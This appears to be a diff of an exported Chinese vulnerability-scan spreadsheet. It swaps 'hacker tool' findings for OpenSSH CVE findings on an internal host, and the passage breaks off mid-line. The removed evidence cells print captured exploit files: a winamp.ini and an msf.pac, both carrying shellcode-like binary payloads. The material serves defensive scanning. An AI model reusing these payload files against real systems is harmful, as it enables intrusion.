@@ -3046,25 +2560,29 @@
           <t>原理扫描</t>
         </is>
       </c>
-      <c r="J19" t="inlineStr"/>
+      <c r="J19" t="inlineStr">
+        <is>
+          <t>CVE-2008-5161</t>
+        </is>
+      </c>
       <c r="K19" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L19" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M19" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N19" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O19" t="inlineStr">
@@ -3072,11 +2590,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P19" t="inlineStr">
-        <is>
-          <t>父组名</t>
-        </is>
-      </c>
+      <c r="P19" t="inlineStr"/>
       <c r="Q19" t="inlineStr"/>
       <c r="R19" t="inlineStr">
         <is>
@@ -3085,15 +2599,19 @@
       </c>
       <c r="S19" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T19" t="inlineStr">
         <is>
-          <t>123</t>
-        </is>
-      </c>
-      <c r="U19" t="inlineStr"/>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U19" t="inlineStr">
+        <is>
+          <t>http://10.128.160.50:22</t>
+        </is>
+      </c>
       <c r="V19" t="inlineStr">
         <is>
           <t>未知</t>
@@ -3101,29 +2619,10 @@
       </c>
       <c r="W19" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>页面url: http://10.128.160.50:22
+请求体: -
+响应体: -
+举证描述: 当前openssh为CBC模式，成功读取到泄露文本，检测存在漏洞</t>
         </is>
       </c>
       <c r="X19" t="inlineStr">
@@ -3140,64 +2639,68 @@
     <row r="20">
       <c r="A20" t="inlineStr">
         <is>
-          <t>利用工具</t>
+          <t>OpenSSH 安全漏洞(CVE-2021-41617)</t>
         </is>
       </c>
       <c r="B20" t="inlineStr">
         <is>
-          <t>建议修复</t>
+          <t>尽快修复</t>
         </is>
       </c>
       <c r="C20" t="inlineStr">
         <is>
-          <t>低危</t>
-        </is>
-      </c>
-      <c r="D20" t="inlineStr">
-        <is>
-          <t>黑客工具攻击</t>
-        </is>
-      </c>
-      <c r="E20" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D20" t="inlineStr"/>
+      <c r="E20" t="inlineStr">
+        <is>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/security.html</t>
+        </is>
+      </c>
       <c r="F20" t="inlineStr">
         <is>
-          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH存在安全漏洞。该漏洞源于允许权限提升，因为补充组未按预期初始化。</t>
         </is>
       </c>
       <c r="G20" t="inlineStr">
         <is>
-          <t>活跃漏洞</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H20" t="inlineStr">
         <is>
-          <t>SIP、STA</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I20" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J20" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J20" t="inlineStr">
+        <is>
+          <t>CVE-2021-41617</t>
+        </is>
+      </c>
       <c r="K20" t="inlineStr">
         <is>
-          <t>2026-07-13 20:02</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L20" t="inlineStr">
         <is>
-          <t>2026-07-13 20:02</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M20" t="inlineStr">
         <is>
-          <t>192.200.42.215</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N20" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O20" t="inlineStr">
@@ -3205,11 +2708,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P20" t="inlineStr">
-        <is>
-          <t>子组名</t>
-        </is>
-      </c>
+      <c r="P20" t="inlineStr"/>
       <c r="Q20" t="inlineStr"/>
       <c r="R20" t="inlineStr">
         <is>
@@ -3223,14 +2722,10 @@
       </c>
       <c r="T20" t="inlineStr">
         <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="U20" t="inlineStr">
-        <is>
-          <t>192.200.42.215/winamp.ini</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U20" t="inlineStr"/>
       <c r="V20" t="inlineStr">
         <is>
           <t>未知</t>
@@ -3238,60 +2733,7 @@
       </c>
       <c r="W20" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: 192.200.42.215/winamp.ini
-请求体: GET /winamp.ini HTTP/1.1
-Host: 192.200.42.215
-Connection: keep-alive
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36
-Accept-Encoding: gzip,deflate,sdch
-Accept-Language: zh-CN,zh;q=0.8
-响应体: HTTP/1.1 200 OK
-Date: Tue, 03 Sep 2013 12:04:10 GMT
-Server: Apache/2.4.4 (Win32) OpenSSL/1.0.1e PHP/5.3.23
-Last-Modified: Tue, 03 Sep 2013 07:39:02 GMT
-ETag: "65a-4e575c8656974"
-Accept-Ranges: bytes
-Content-Length: 1626
-Keep-Alive: timeout=5, max=100
-Connection: Keep-Alive
-[Winamp]
-utf8=1
-skin=PrPrYr_r�r-�rHrHrHrHrÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rrÆfr@rÆr@rÆÊr@rÆÿr@rÆr@rÆBr@rÆRr@rÆjr@rÆr@r4444ð0rÆXr@rÆÍr@rÆ.r@rÆ&lt;r@rÆr@rÆZr@rÆtr@rÆïr@rÆ¸r@rÆar@rÆyr@rÆmr@rÆnr@rÆr@rÆúr@rÆ¯r@rÆur@rÆêr@rÆ¯r@rÆur@rÆçr@rÆÿr@rÆçrWrÃ44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
-[WinampReg]
-IsFirstInst=0
-NeedReg=0
-[in_wm]
-numtypes=7
-type0=WMA
-description0=Windows Media Audio File (*.WMA)
-protocol0=0
-avtype0=0
-type1=WMV
-description1=Windows Media Video File (*.WMV)
-protocol1=0
-avtype1=1
-type2=ASF
-description2=Advanced Streaming Format (*.ASF)
-protocol2=0
-avtype2=1
-type3=MMS://
-description3=Windows Media Stream
-protocol3=1
-avtype3=1
-type4=MMSU://
-description4=Windows Media Stream
-protocol4=1
-avtype4=1
-type5=MMST://
-description5=Windows Media Stream
-protocol5=1
-avtype5=1
-type5=�
-description6=aymnaymn�К[�t$�Z+ɱE�1zz�^,rҠ̓�)(�M8�'l�J�B�(�xIi��5[�Br�&lt;+�X�3�ѫa�k�Q�)ٯ�H� ;ӕ�Y�6#�Gd�?2�Ee��{	�s_�?��ar��	ЀH�P�n�9�X�g/�@ו�c�=�W�=�,�4ۥu݂&lt;Ā4���:�h�`��8�ӂ�mT.�Bǐ�s�r��c�z�#0V�Ċ�i�#O�M�=�R_���'N�WA&gt;-�niC|��ϸ&lt;�Ny�
-protocol6=0
-avtype6=0
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X20" t="inlineStr">
@@ -3308,64 +2750,74 @@
     <row r="21">
       <c r="A21" t="inlineStr">
         <is>
-          <t>利用工具</t>
+          <t>OpenSSH ssh-agent远程代码执行漏洞(CVE-2023-38408)</t>
         </is>
       </c>
       <c r="B21" t="inlineStr">
         <is>
-          <t>建议修复</t>
+          <t>尽快修复</t>
         </is>
       </c>
       <c r="C21" t="inlineStr">
         <is>
-          <t>低危</t>
+          <t>高危</t>
         </is>
       </c>
       <c r="D21" t="inlineStr">
         <is>
-          <t>黑客工具攻击</t>
-        </is>
-      </c>
-      <c r="E21" t="inlineStr"/>
+          <t>代码执行</t>
+        </is>
+      </c>
+      <c r="E21" t="inlineStr">
+        <is>
+          <t>该漏洞在OpenSSH 9.3p2版本中已得到修复。建议用户升级到最新版本。对于 OpenBSD，发布了一个勘误补丁来修复此问题。
+链接如下：https://www.openssh.com/releasenotes.html
+https://www.openbsd.org/errata.html</t>
+        </is>
+      </c>
       <c r="F21" t="inlineStr">
         <is>
-          <t>黑客工具利用漏洞是指黑客或攻击者使用专门设计的软件或脚本，寻找并利用计算机系统、网络或应用程序中的安全漏洞，从而执行未经授权的操作。这些工具可以自动化地扫描、检测和利用已知或未知的漏洞，以实现多种恶意目的，如获取系统控制权、窃取敏感信息、传播恶意软件等。</t>
+          <t>OpenSSH 的 ssh-agent 中存在了一个远程代码执行漏洞。此漏洞允许远程攻击者在存在漏洞的 OpenSSH的 forwarded ssh-agent 代理上执行任意命令。</t>
         </is>
       </c>
       <c r="G21" t="inlineStr">
         <is>
-          <t>活跃漏洞</t>
+          <t>有攻击代码披露</t>
         </is>
       </c>
       <c r="H21" t="inlineStr">
         <is>
-          <t>SIP</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I21" t="inlineStr">
         <is>
-          <t>原理扫描</t>
-        </is>
-      </c>
-      <c r="J21" t="inlineStr"/>
+          <t>版本比对</t>
+        </is>
+      </c>
+      <c r="J21" t="inlineStr">
+        <is>
+          <t>CVE-2023-38408</t>
+        </is>
+      </c>
       <c r="K21" t="inlineStr">
         <is>
-          <t>2026-07-13 20:02</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L21" t="inlineStr">
         <is>
-          <t>2026-07-13 20:02</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M21" t="inlineStr">
         <is>
-          <t>192.200.41.126</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N21" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O21" t="inlineStr">
@@ -3387,14 +2839,10 @@
       </c>
       <c r="T21" t="inlineStr">
         <is>
-          <t>80</t>
-        </is>
-      </c>
-      <c r="U21" t="inlineStr">
-        <is>
-          <t>192.200.41.126/repro/msf.pac</t>
-        </is>
-      </c>
+          <t>22</t>
+        </is>
+      </c>
+      <c r="U21" t="inlineStr"/>
       <c r="V21" t="inlineStr">
         <is>
           <t>未知</t>
@@ -3402,44 +2850,7 @@
       </c>
       <c r="W21" t="inlineStr">
         <is>
-          <t>页面url: 192.200.41.126/repro/msf.pac
-请求体: GET /repro/msf.pac HTTP/1.1
-Host: 192.200.41.126
-Connection: keep-alive
-User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-Referer: http://192.200.41.126/repro/
-Accept-Encoding: gzip,deflate,sdch
-Accept-Language: zh-CN,zh;q=0.8
-Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
-响应体: HTTP/1.1 200 OK
-Date: Thu, 05 Jul 2012 08:27:57 GMT
-Server: Apache/2.2.15 (Win32) PHP/5.2.13
-Last-Modified: Thu, 05 Jul 2012 07:39:53 GMT
-ETag: "4000000004d60-314-4c41040db73c8"
-Accept-Ranges: bytes
-Content-Length: 788
-Keep-Alive: timeout=5, max=100
-Connection: Keep-Alive
-Content-Type: text/plain
-&lt;?xml version="1.0"?&gt;
-&lt;PacDesignData&gt;
-  &lt;DocFmtVersion&gt;1&lt;/DocFmtVersion&gt;
-  &lt;DeviceType&gt;ispPAC-CLK5410D&lt;/DeviceType&gt;
-  &lt;CreatedBy&gt;PAC-Designer 6.21.1336&lt;/CreatedBy&gt;
-  &lt;SummaryInformation&gt;
-    &lt;Title&gt;�ľ�H\�t$�[1ɱ31s�sP�_�!��W_��(�B��A�!'�r�#�V�%G��vgYǿ�h�
-�+�SwqV�v�e0Yc!�X�1�͂��V�g�hjȭ�(��M�|�`�Q`��ݡ+�*�hh�1*�GA�e�*�i�uJi�u��U�ЪDtp#�.�W1�)�v�b�x?��Q�&lt;/Title&gt;
-    &lt;Author&gt;eWockK&lt;/Author&gt;
-  &lt;/SummaryInformation&gt;
-  &lt;SymbolicSchematicData&gt;
-    &lt;Symbol&gt;
-      &lt;SymKey&gt;153&lt;/SymKey&gt;
-      &lt;NameText&gt;Profile 0 Ref Frequency&lt;/NameText&gt;
-      &lt;Value&gt;__\aaaaaaQ�QunfgpIcguMsPZpAZDzGHTxSQpnvmfxkWBqTuWmXfPTbECGIXeZftoUOFsHvncyJRZCRyvkxvaFtiwknBFWPZ�Lq P�&lt;/Value&gt;
-    &lt;/Symbol&gt;
-  &lt;/SymbolicSchematicData&gt;
-&lt;/PacDesignData&gt;</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X21" t="inlineStr">
@@ -3456,7 +2867,7 @@
     <row r="22">
       <c r="A22" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>openssh 安全漏洞 (CVE-2023-48795)</t>
         </is>
       </c>
       <c r="B22" t="inlineStr">
@@ -3466,58 +2877,54 @@
       </c>
       <c r="C22" t="inlineStr">
         <is>
-          <t>高危</t>
+          <t>中危</t>
         </is>
       </c>
       <c r="D22" t="inlineStr"/>
       <c r="E22" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>建议您更新当前系统或软件至最新版，完成漏洞的修复。</t>
         </is>
       </c>
       <c r="F22" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
-        </is>
-      </c>
-      <c r="G22" t="inlineStr">
-        <is>
-          <t>有攻击代码披露</t>
-        </is>
-      </c>
+          <t>OpenSSH（OpenBSD Secure Shell）是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞，该漏洞源于允许远程攻击者绕过完整性检查，从而省略某些数据包。</t>
+        </is>
+      </c>
+      <c r="G22" t="inlineStr"/>
       <c r="H22" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I22" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J22" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2023-48795</t>
         </is>
       </c>
       <c r="K22" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L22" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M22" t="inlineStr">
         <is>
-          <t>192.168.64.44</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N22" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O22" t="inlineStr">
@@ -3539,7 +2946,7 @@
       </c>
       <c r="T22" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U22" t="inlineStr"/>
@@ -3550,29 +2957,7 @@
       </c>
       <c r="W22" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X22" t="inlineStr">
@@ -3589,7 +2974,7 @@
     <row r="23">
       <c r="A23" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>OpenSSH命令注入漏洞(CVE-2023-51385)</t>
         </is>
       </c>
       <c r="B23" t="inlineStr">
@@ -3599,18 +2984,23 @@
       </c>
       <c r="C23" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D23" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D23" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
       <c r="E23" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>当前官方已发布最新版本，建议受影响的用户及时更新升级到最新版本。链接如下：
+https://www.openssh.com/openbsd.html</t>
         </is>
       </c>
       <c r="F23" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>该漏洞是由于OpenSSH处理主机名称中的特殊符号不严谨，如果用户名或主机名中含有shell元字符（如 | ‘ “等），并且ssh_config中ProxyCommand、LocalCommand指令或”match exec”谓词通过%u、%h或类似的扩展标记引用用户或主机名时，可能会发生命令注入。攻击者可利用该漏洞在获得权限或钓鱼攻击的情况下，构造恶意数据执行命令注入攻击.</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -3620,37 +3010,37 @@
       </c>
       <c r="H23" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I23" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J23" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2023-51385</t>
         </is>
       </c>
       <c r="K23" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L23" t="inlineStr">
         <is>
-          <t>2026-07-14 09:23</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M23" t="inlineStr">
         <is>
-          <t>192.168.64.44</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N23" t="inlineStr">
         <is>
-          <t>终端</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O23" t="inlineStr">
@@ -3672,7 +3062,7 @@
       </c>
       <c r="T23" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U23" t="inlineStr"/>
@@ -3683,29 +3073,7 @@
       </c>
       <c r="W23" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" 